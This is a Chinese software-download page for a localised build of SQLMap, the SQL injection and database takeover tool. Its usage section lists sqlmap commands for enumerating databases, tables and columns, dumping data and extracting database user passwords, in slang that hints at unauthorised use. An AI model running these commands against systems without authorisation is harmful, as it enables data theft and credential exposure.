sqlmap下载-SQLMap自动SQL注入工具下载 汉化版-纯净系统基地
您的位置:首页 > > 系统工具 > sqlmap下载
71.56%
28.44%

SQLMap自动SQL注入工具 汉化版

  • 授权方式:系统工具
  • 软件类别:
  • 软件大小:21.44M
  • 推荐星级:
  • 软件语言:简体中文
  • 更新时间:2024-08-23
  • 运行环境:PC/Windows
  • 本地下载文件大小:21.44M

  • 软件介绍
  • 软件截图
  • 相关下载
软件标签:
SQLMap是一款开源的自动化SQL注入和数据库接管工具,它被广泛用于网络安全测试和渗透测试中,可以帮助安全研究人员和渗透测试人员发现和利用Web应用程序中的SQL注入漏洞。


解压密码为:www.cjbxt.com

功能

SQLMap的主要功能是自动化检测和利用SQL注入漏洞。它能够:
- 检测SQL注入漏洞的存在。
- 利用SQL注入漏洞来获取数据库服务器的权限。
- 从数据库中提取数据。
- 在有足够权限的情况下,对数据库进行操作,如添加、删除、修改数据。

使用说明

SqlMap_gui
mssql access 直接爆表.然后你懂的
BT5里面的话前面就要加python
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users   查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段
翻回来也行
sqlmap.py -u url  判断
sqlmap.py -u url --is-dba -v   这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0  这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D '表' 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0

sqlmap-py原版
这里配置的python27是安装到 e:\python27\ 目录下的,如果不能正常运行。需要修改配置文件。
SQLMAP Win 下Python环境运行不正常解决
通过官网的包下载过来运行测试注入只弹出了cmd 运行框。
找到sqm.pyw 用记事本打开找到 “cmd = “start……. ” 把这一行参数替换成以下的 参数就可以正常运行了,不过python的环境装在什么位置就改什么路径。
cmd = "start cmd.exe /k e:\python27\python.exe sqlmap.py" + self.sqlEdit.get()

特点

- 支持多种数据库:SQLMap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、SQLite、Microsoft SQL Server等。
- 强大的检测引擎:SQLMap拥有一个强大的检测引擎,能够识别不同类型的SQL注入漏洞。
- 广泛的选项和功能:SQLMap提供了丰富的选项,用户可以根据需要选择不同的参数来执行特定的任务。
- 支持多种注入技术:SQLMap实现了多种SQL注入技术,如时间盲注、错误基注入、联合查询注入等。
- 绕过防护措施:能够绕过一些安全防护措施,例如WAF(Web应用程序防火墙)。
- 用户友好的界面:虽然SQLMap是一个命令行工具,但它提供了详细的输出和易于理解的提示,使得用户可以更容易地进行操作。

SQLMap是一个强大的工具,网络安全专业人员经常用它来评估和增强Web应用程序的安全性。

权限要求

SQLMap自动SQL注入工具 汉化版

普通下载地址:
本地普通下载
本地电信下载
浙江移动下载
广东电信下载